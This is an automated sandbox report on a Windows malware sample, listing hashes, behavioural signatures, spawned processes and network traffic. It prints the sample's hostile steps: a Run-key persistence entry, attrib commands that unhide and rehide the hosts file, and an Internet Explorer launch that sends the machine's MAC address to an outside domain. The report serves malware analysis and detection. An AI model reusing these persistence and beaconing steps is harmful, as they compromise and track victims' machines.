Analysis
- max time kernel: 44s
- max time network: 120s
- platform: windows10-2004_x64
- resource: win10v2004-20231222-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231222-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 05-01-2024 03:51
Static task: static1
Behavioral task: behavioral1
  Sample: 42aea7e72270c79f9f577b979828bc0d.exe
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: 42aea7e72270c79f9f577b979828bc0d.exe
  Resource: win10v2004-20231222-en
General
- Target: 42aea7e72270c79f9f577b979828bc0d.exe
- Size: 47KB
- MD5: 42aea7e72270c79f9f577b979828bc0d
- SHA1: 8fa941a906a756b11e000db02cb3d06a4a51f976
- SHA256: b5ae6d2c48d06d0764e04b5c8e57dff529aa74bf57f10b652a4b040fe8d30ad7
- SHA512: 61d8cf5ca3b7fc570718fdad605aba5940a62b138bbbf17088f35236d7de7a4d216eee05928ed72d565b904865cbaaca44888000d57e3db70c8aae682d173702
- SSDEEP: 768:o6QZ/MVvp3w/qUfsRd9Zsb5CDsaSur5dikXB5ZCgcFEaW6FqTwPhrvSQ1KIsmY:s/MVvp3w/hcG5esaSur5A6ZCgRbVTkA5
Malware Config
Signatures
- Adds policy Run key to start application (2 TTPs, 2 IoCs)
  Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run (process: 42aea7e72270c79f9f577b979828bc0d.exe)
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\qq = "C:\\Users\\Admin\\AppData\\Local\\Temp\\42aea7e72270c79f9f577b979828bc0d.exe" (process: 42aea7e72270c79f9f577b979828bc0d.exe)
- Drops file in Drivers directory (1 IoCs)
  File opened for modification: C:\Windows\system32\drivers\etc\hosts (process: 42aea7e72270c79f9f577b979828bc0d.exe)
- Sets file to hidden (1 TTPs, 1 IoCs)
  Modifies file attributes to stop it showing in Explorer etc.
  PID 5024: attrib.exe
- Modifies Internet Explorer settings
  Set value (int): \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" (process: iexplore.exe)
  Key created: \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Main (process: iexplore.exe)
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  PID 3592: 42aea7e72270c79f9f577b979828bc0d.exe
  PID 3592: 42aea7e72270c79f9f577b979828bc0d.exe
- Suspicious use of SetWindowsHookEx (2 IoCs)
  PID 4952: iexplore.exe
  PID 4952: iexplore.exe
- Suspicious use of WriteProcessMemory (11 IoCs)
  description / pid / Process / procid_target:
  PID 3592 wrote to memory of 2820 / 3592 / 42aea7e72270c79f9f577b979828bc0d.exe / 47
  PID 3592 wrote to memory of 2820 / 3592 / 42aea7e72270c79f9f577b979828bc0d.exe / 47
  PID 3592 wrote to memory of 2820 / 3592 / 42aea7e72270c79f9f577b979828bc0d.exe / 47
  PID 3592 wrote to memory of 5024 / 3592 / 42aea7e72270c79f9f577b979828bc0d.exe / 91
  PID 3592 wrote to memory of 5024 / 3592 / 42aea7e72270c79f9f577b979828bc0d.exe / 91
  PID 3592 wrote to memory of 5024 / 3592 / 42aea7e72270c79f9f577b979828bc0d.exe / 91
  PID 3592 wrote to memory of 4952 / 3592 / 42aea7e72270c79f9f577b979828bc0d.exe / 105
  PID 3592 wrote to memory of 4952 / 3592 / 42aea7e72270c79f9f577b979828bc0d.exe / 105
  PID 4952 wrote to memory of 3876 / 4952 / iexplore.exe / 106
  PID 4952 wrote to memory of 3876 / 4952 / iexplore.exe / 106
  PID 4952 wrote to memory of 3876 / 4952 / iexplore.exe / 106
- Views/modifies file attributes (1 TTPs, 2 IoCs)
  PID 2820: attrib.exe
  PID 5024: attrib.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\42aea7e72270c79f9f577b979828bc0d.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\42aea7e72270c79f9f577b979828bc0d.exe"
  PID: 3592
  Signatures: Adds policy Run key to start application; Drops file in Drivers directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\attrib.exe
    Command line: attrib -s -h "C:\Windows\system32\drivers\etc\hosts"
    PID: 2820
    Signatures: Views/modifies file attributes
  - C:\Windows\SysWOW64\attrib.exe
    Command line: attrib +s +h "C:\Windows\system32\drivers\etc\hosts"
    PID: 5024
    Signatures: Sets file to hidden; Views/modifies file attributes
  - C:\program files\internet explorer\iexplore.exe
    Command line: "C:\program files\internet explorer\iexplore.exe" "http://www.2009ylm.cn/union/install.asp?ver=090107&tgid=p222&address=FE-6B-1C-63-FC-C4&regk=1&flag=49b94138570212aa317e658a0d60d8c6&frandom=9969"
    PID: 4952
    Signatures: Modifies Internet Explorer settings; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
    - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4952 CREDAT:17410 /prefetch:2
      PID: 3876
- C:\Windows\system32\AUDIODG.EXE
  Command line: C:\Windows\system32\AUDIODG.EXE 0x50c 0x4a0
  PID: 1440
Network
- DNS query to 8.8.8.8:53
  Request: g.bing.com IN A
  Response: g.bing.com IN CNAME g-bing-com.a-0001.a-msedge.net
            g-bing-com.a-0001.a-msedge.net IN CNAME dual-a-0001.a-msedge.net
            dual-a-0001.a-msedge.net IN A 204.79.197.200
            dual-a-0001.a-msedge.net IN A 13.107.21.200
- HTTP GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=
  Remote address: 204.79.197.200:443
  Request:
  GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid= HTTP/2.0
  host: g.bing.com
  accept-encoding: gzip, deflate
  user-agent: WindowsShellClient/9.0.40929.0 (Windows)
  Response:
  HTTP/2.0 204
  pragma: no-cache
  expires: Fri, 01 Jan 1990 00:00:00 GMT
  set-cookie: MUID=3014C7E2D03F6EA92C23D41FD1846F9A; domain=.bing.com; expires=Wed, 29-Jan-2025 03:51:37 GMT; path=/; SameSite=None; Secure; Priority=High;
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  access-control-allow-origin: *
  x-cache: CONFIG_NOCACHE
  accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  x-msedge-ref: Ref A: 8CBF64E5B7D14CF38A828013491E2CCA Ref B: LON04EDGE0810 Ref C: 2024-01-05T03:51:37Z
  date: Fri, 05 Jan 2024 03:51:36 GMT
- HTTP GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=
  Remote address: 204.79.197.200:443
  Request:
  GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid= HTTP/2.0
  host: g.bing.com
  accept-encoding: gzip, deflate
  user-agent: WindowsShellClient/9.0.40929.0 (Windows)
  cookie: MUID=3014C7E2D03F6EA92C23D41FD1846F9A
  Response:
  HTTP/2.0 204
  pragma: no-cache
  expires: Fri, 01 Jan 1990 00:00:00 GMT
  set-cookie: MSPTC=Wzg-aWUjNjKe5jzK9VH2knlpmU6ZFxSMC2_LIUdulGk; domain=.bing.com; expires=Wed, 29-Jan-2025 03:51:37 GMT; path=/; Partitioned; secure; SameSite=None
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  access-control-allow-origin: *
  x-cache: CONFIG_NOCACHE
  accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  x-msedge-ref: Ref A: F69A40A4FF924529947CB2BF47B4D76E Ref B: LON04EDGE0810 Ref C: 2024-01-05T03:51:37Z
  date: Fri, 05 Jan 2024 03:51:36 GMT
- HTTP GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=
  Remote address: 204.79.197.200:443
  Request:
  GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid= HTTP/2.0
  host: g.bing.com
  accept-encoding: gzip, deflate
  user-agent: WindowsShellClient/9.0.40929.0 (Windows)
  cookie: MUID=3014C7E2D03F6EA92C23D41FD1846F9A; MSPTC=Wzg-aWUjNjKe5jzK9VH2knlpmU6ZFxSMC2_LIUdulGk
  Response:
  HTTP/2.0 204
  pragma: no-cache
  expires: Fri, 01 Jan 1990 00:00:00 GMT
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  access-control-allow-origin: *
  x-cache: CONFIG_NOCACHE
  accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  x-msedge-ref: Ref A: 7BAF3360C5964F62B37AA24CEF906992 Ref B: LON04EDGE0810 Ref C: 2024-01-05T03:51:37Z
  date: Fri, 05 Jan 2024 03:51:37 GMT
- DNS query to 8.8.8.8:53
  Request: 208.194.73.20.in-addr.arpa IN PTR
  Response: (empty)
- DNS query to 8.8.8.8:53
  Request: 208.194.73.20.in-addr.arpa IN PTR
- DNS query to 8.8.8.8:53
  Request: 173.178.17.96.in-addr.arpa IN PTR
  Response: 173.178.17.96.in-addr.arpa IN PTR a96-17-178-173.deploy.static.akamaitechnologies.com
- DNS query to 8.8.8.8:53
  Request: 173.178.17.96.in-addr.arpa IN PTR
- DNS query to 8.8.8.8:53
  Request: 200.197.79.204.in-addr.arpa IN PTR
  Response: 200.197.79.204.in-addr.arpa IN PTR a-0001.a-msedge.net
- DNS query to 8.8.8.8:53
  Request: 200.197.79.204.in-addr.arpa IN PTR
- DNS query to 8.8.8.8:53
  Request: 95.221.229.192.in-addr.arpa IN PTR
  Response: (empty)
- DNS query to 8.8.8.8:53
  Request: 19.177.190.20.in-addr.arpa IN PTR
  Response: (empty)
- DNS query to 8.8.8.8:53
  Request: 158.240.127.40.in-addr.arpa IN PTR
  Response: (empty)
- DNS query to 8.8.8.8:53
  Request: 241.154.82.20.in-addr.arpa IN PTR
  Response: (empty)
- DNS query to 8.8.8.8:53
  Request: 43.58.199.20.in-addr.arpa IN PTR
  Response: (empty)
- DNS query to 8.8.8.8:53
  Request: 157.123.68.40.in-addr.arpa IN PTR
  Response: (empty)
- DNS query to 8.8.8.8:53
  Request: 0.159.190.20.in-addr.arpa IN PTR
  Response: (empty)
- DNS query to 8.8.8.8:53
  Request: 41.110.16.96.in-addr.arpa IN PTR
  Response: 41.110.16.96.in-addr.arpa IN PTR a96-16-110-41.deploy.static.akamaitechnologies.com
- DNS query to 8.8.8.8:53
  Request: tse1.mm.bing.net IN A
  Response: tse1.mm.bing.net IN CNAME mm-mm.bing.net.trafficmanager.net
            mm-mm.bing.net.trafficmanager.net IN CNAME dual-a-0001.a-msedge.net
            dual-a-0001.a-msedge.net IN A 204.79.197.200
            dual-a-0001.a-msedge.net IN A 13.107.21.200